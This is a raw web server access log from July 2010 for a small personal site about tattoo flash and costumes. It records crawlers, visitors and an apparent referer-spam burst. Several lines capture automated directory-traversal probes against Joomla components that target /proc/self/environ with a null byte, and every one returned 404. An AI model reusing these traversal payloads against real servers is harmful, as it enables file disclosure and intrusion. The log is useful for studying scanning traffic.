204.15.39.12 - - [08/Jul/2010:21:20:42 -0500] "HEAD /logs/access_log.1276732800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:42 -0500] "HEAD /logs/access_log.1276819200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:42 -0500] "HEAD /logs/access_log.1276905600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:42 -0500] "HEAD /logs/access_log.1276992000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:43 -0500] "HEAD /logs/access_log.1277078400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:43 -0500] "HEAD /logs/access_log.1277164800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:43 -0500] "HEAD /logs/access_log.1277251200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:44 -0500] "HEAD /logs/access_log.1277337600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:44 -0500] "HEAD /logs/access_log.1277424000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:44 -0500] "HEAD /logs/access_log.1277510400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:44 -0500] "HEAD /logs/access_log.1277596800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:45 -0500] "HEAD /logs/access_log.1277683200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:45 -0500] "HEAD /logs/access_log.1277769600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:45 -0500] "HEAD /logs/access_log.1277856000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:46 -0500] "HEAD /logs/access_log.1277942400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:46 -0500] "HEAD /logs/access_log.1278028800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:46 -0500] "HEAD /logs/access_log.1278115200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:46 -0500] "HEAD /logs/access_log.1278201600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:47 -0500] "HEAD /logs/access_log.1278288000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:50 -0500] "GET /logs/access_log.1278288000 HTTP/1.1" 206 1134955 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:50 -0500] "HEAD /logs/access_log.1278374400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:52 -0500] "GET /logs/access_log.1278374400 HTTP/1.1" 206 636489 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:52 -0500] "HEAD /logs/access_log.1278460800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:54 -0500] "GET /logs/access_log.1278460800 HTTP/1.1" 206 590042 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:54 -0500] "HEAD /logs/access_log.1278547200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:56 -0500] "GET /logs/access_log.1278547200 HTTP/1.1" 206 473257 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:56 -0500] "HEAD /logs/access_log.1278633600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [08/Jul/2010:21:20:57 -0500] "GET /logs/access_log.1278633600 HTTP/1.1" 206 53888 "-""Botslist Botfinder (+http://www.botslist.ca)"
207.46.195.242 - - [08/Jul/2010:21:23:34 -0500] "GET /logs/access_log.1198022400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/Jul/2010:21:25:36 -0500] "GET /logs/access_log.1274659200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.250.255.243 - - [08/Jul/2010:21:43:01 -0500] "GET /logs/access_log.1277596800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.112.232 - - [08/Jul/2010:21:45:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [08/Jul/2010:21:45:47 -0500] "GET /logs/access_log.1199232000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/Jul/2010:21:59:08 -0500] "GET /logs/access_log.1274918400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
62.44.82.118 - - [08/Jul/2010:22:18:13 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.46.195.241 - - [08/Jul/2010:22:18:33 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/Jul/2010:22:20:07 -0500] "GET /logs/access_log.1275004800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
62.44.82.118 - - [08/Jul/2010:22:22:54 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
66.249.71.179 - - [08/Jul/2010:22:24:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.179 - - [08/Jul/2010:22:24:12 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
24.166.124.242 - - [08/Jul/2010:22:25:10 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://zamyr.freeblogshost.in/100505/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.1 (.NET CLR 3.5.30729)"
62.44.82.118 - - [08/Jul/2010:22:25:55 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.232 - - [08/Jul/2010:22:37:35 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/url?sa=t&source=web&cd=8&ved=0CDwQFjAH&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo-order.htm&rct=j&q=vintage%20tattoo%20flash%20sheets&ei=4Jk2TPnCA8Sclgf91NXVBw&usg=AFQjCNEeEdIdLgOY1g0Cv6KrzoqwJV2Kig""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:48 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:40:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
38.101.148.126 - - [08/Jul/2010:22:41:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
68.13.74.219 - - [08/Jul/2010:22:41:05 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:41:06 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
38.101.148.126 - - [08/Jul/2010:22:41:07 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [08/Jul/2010:22:41:48 -0500] "GET /logs/access_log.1277942400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.115.111.248 - - [08/Jul/2010:22:51:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
68.13.74.219 - - [08/Jul/2010:22:55:34 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/url?sa=t&source=web&cd=5&ved=0CC8QFjAE&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=tattoo%20flash%20vintage&ei=tJ02TISDB8b_lgfd25nVBw&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:34 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:38 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
68.13.74.219 - - [08/Jul/2010:22:55:39 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
87.250.255.243 - - [08/Jul/2010:23:03:12 -0500] "GET /logs/access_log.1277769600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
78.46.59.3 - - [08/Jul/2010:23:07:50 -0500] "GET /logs/access_log.1275782400//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.830"
78.46.59.3 - - [08/Jul/2010:23:07:50 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.830"
78.46.59.3 - - [08/Jul/2010:23:07:50 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.830"
78.46.59.3 - - [08/Jul/2010:23:07:50 -0500] "GET /logs/access_log.1277942400//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.830"
216.105.40.177 - - [08/Jul/2010:23:11:27 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
67.195.112.232 - - [08/Jul/2010:23:22:50 -0500] "GET /logs/access_log.1252972800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.182 - - [08/Jul/2010:23:32:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/Jul/2010:23:37:18 -0500] "GET /logs/access_log.1273449600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.112.232 - - [08/Jul/2010:23:43:48 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.236 - - [08/Jul/2010:23:46:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.236 - - [08/Jul/2010:23:47:36 -0500] "GET /logs/access_log.1265155200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.179 - - [08/Jul/2010:23:57:43 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.53 - - [09/Jul/2010:00:02:34 -0500] "GET /logs/access_log.1160265600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [09/Jul/2010:00:12:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
207.46.13.84 - - [09/Jul/2010:00:14:34 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.232 - - [09/Jul/2010:00:23:05 -0500] "GET /logs/access_log.1169164800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.179 - - [09/Jul/2010:00:35:49 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.179 - - [09/Jul/2010:00:35:49 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.179 - - [09/Jul/2010:00:35:50 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.179 - - [09/Jul/2010:00:35:50 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.39 - - [09/Jul/2010:00:38:04 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.112.8.70 - - [09/Jul/2010:00:39:11 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
98.250.160.208 - - [09/Jul/2010:00:39:13 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
70.171.230.54 - - [09/Jul/2010:00:39:42 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
61.183.41.66 - - [09/Jul/2010:00:39:48 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
187.45.193.143 - - [09/Jul/2010:00:39:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.171.230.54 - - [09/Jul/2010:00:39:52 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
195.117.121.180 - - [09/Jul/2010:00:40:29 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
75.74.182.193 - - [09/Jul/2010:00:40:29 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
96.31.245.50 - - [09/Jul/2010:00:40:31 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
222.107.34.53 - - [09/Jul/2010:00:40:35 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
72.249.119.49 - - [09/Jul/2010:00:40:41 -0500] "GET /logs/access_log.1277942400//index.php?option=com_redtwitter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:00:40:41 -0500] "GET //index.php?option=com_redtwitter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:00:40:41 -0500] "GET /logs//index.php?option=com_redtwitter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.249.119.49 - - [09/Jul/2010:00:40:54 -0500] "GET /logs/access_log.1276041600//index.php?option=com_redtwitter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
98.244.125.5 - - [09/Jul/2010:00:40:58 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
74.98.187.103 - - [09/Jul/2010:00:41:00 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
75.74.182.193 - - [09/Jul/2010:00:41:01 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
109.72.70.53 - - [09/Jul/2010:00:41:03 -0500] "GET /logs/access_log.1216598400 HTTP/1.1" 404 310 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
74.192.240.127 - - [09/Jul/2010:00:41:07 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
81.24.210.26 - - [09/Jul/2010:00:41:09 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
71.139.196.129 - - [09/Jul/2010:00:41:13 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
68.51.92.229 - - [09/Jul/2010:00:41:14 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
98.226.215.251 - - [09/Jul/2010:00:41:17 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
173.66.148.26 - - [09/Jul/2010:00:41:18 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
